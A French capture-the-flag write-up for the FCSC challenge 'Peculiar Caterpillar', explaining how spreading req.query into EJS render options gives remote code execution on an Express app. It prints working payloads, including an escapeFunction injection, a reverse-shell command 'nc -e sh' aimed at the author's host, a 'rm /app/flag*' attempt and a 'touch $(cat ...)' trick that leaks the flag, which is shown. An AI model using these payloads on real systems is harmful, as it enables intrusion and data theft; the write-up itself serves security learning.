# Peculiar Caterpillar

## Énoncé

Alors qu'elle se promenait au Pays des merveilles, Alice tomba sur une chenille étrange. À sa grande surprise, cette dernière se vantait d'avoir construit son propre site web en utilisant Javascript. Bien que le site semblait simple, Alice ne pouvait s'empêcher de se demander s'il était vraiment sécurisé.

https://peculiar-caterpillar.france-cybersecurity-challenge.fr/

- [peculiar-caterpillar.tar.gz](peculiar-caterpillar.tar.gz)

## Solution

L'application est assez simple, voici son rendu :

![](website.png)

L'archive contient une description `docker-compose` avec une image Docker dont le flag est écrit dans un fichier (dont le nom comporte une partie
aléatoire), et qui contient une application
simple Node.js/Express. Un `npm audit` ne retourne rien. L'application utilise le moteur de template [EJS](https://ejs.co/).

Un point important à noter est que le rendu du template est réalisé par la ligne suivante :

```Javascript
res.render("index", { name: "World", ...req.query })
```

Ce qui est intéressant dans la construction `...`, c'est qu'on injecte tout le contenu de `req.query` dans les paramètres du template. Cela
signifie que l'on peut écraser des valeurs existantes. On peut le montrer en écrasant le contenu de `name` avec l'URL `/?name=plop` : 

![](plop.png)

Cela signifie  que l'on peut potentiellement écraser d'autre choses dans le contexte de rendu du template. C'est le moment de faire 
quelques recherches à ce sujet. Et assez rapidement, on tombe sur [ce billet de blog](https://eslam.io/posts/ejs-server-side-template-injection-rce/).
L'auteur se trouve dans la même position que nous et constate : *The data and options is merged together through this function `utils.shallowCopyFromList` So in theory we can overwrite the template options with the data (coming from user)*. 
Il propose de tester en écrasant la valeur `delimiter` avec `/?delimiter=NotExistsDelimiter`.

![](nodelimiter.png)

Et en effet, cela fonctionne également pour nous, on récupère le template non interprétré. On continue la lecture du billet et on teste
la payload que l'auteur utilise pour obtenir une RCE, mais patatras ! Cela ne fonctionne pas chez nous. En effet, l'auteur décrit en
fait une CVE `prototype pollution` qui a été corrigée par les équipes d'`EJS`. Peut-être que l'on peut trouver une autre méthode ?

Et oui, la suite des recherches donnent [une autre méthode](https://mizu.re/post/ejs-server-side-prototype-pollution-gadgets-to-rce). Fun fact :
ce même blog contient des write-ups pour le FCSC2023, donc c'est un joueur de ce même CTF ! :D

Ce qu'il propose dans son PoC est de polluer la fonction escapeFunction de la manière suivante :
```Javascript
{
    "__proto__": {
        "client": 1,
        "escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | nc localhost 4444')"
    }
}
```

On tente tout de suite avec à peu près la même payload, mais pointant vers mon serveur : `/?client=1&settings[view%20options][escapeFunction]=process.mainModule.require(%27child_process%27).execSync(%27nc%20-e%20sh%20XXXX%201337%27);s`. Cela ne fonctionne pas, mais le retour est motivant :

```
Error: Command failed: nc -e sh XXXX 1337
BusyBox v1.35.0 (2022-11-19 10:13:10 UTC) multi-call binary.
```

Le container n'a probablement pas les droits pour sortir par Internet. On continue à jouer avec la vulnérabilité pour constater plusieurs choses : la mauvaise 
nouvelle, c'est que seule la sortie d'erreur est affichée par le template. La bonne nouvelle est que le disque du conteneur est en lecture seule. On
va tourner cela à notre avantage. Par exemple, si on essaie de supprimer tous les fichiers `/app/flag*` sur un disque en lecture seule, [que se passe-t-il](https://peculiar-caterpillar.france-cybersecurity-challenge.fr/?client=1&settings[view%20options][escapeFunction]=process.mainModule.require(%27child_process%27).execSync(%27rm%20/app/flag*%27);s) ?

```
Error: Command failed: rm /app/flag*
rm: can't remove '/app/flag-a49d3e9518ee659fa932482818e7eeeb.txt': Read-only file system
```

Merci pour le nom du flag ! Faisons maintenant en sorte de lire son contenu en demandant [la création d'un fichier dont le nom est le contenu du fichier flag (`touch $(cat /app/flag*)`)](https://peculiar-caterpillar.france-cybersecurity-challenge.fr/?client=1&settings[view%20options][escapeFunction]=process.mainModule.require(%27child_process%27).execSync(%27touch%20$(cat%20/app/flag*)%27);s) :


```
Error: Command failed: touch $(cat /app/flag*)
touch: FCSC{232448f3783105b36ab9d5f90754417a4f17931b4bdeeb6f301af2db0088cef6}: Read-only file system
```
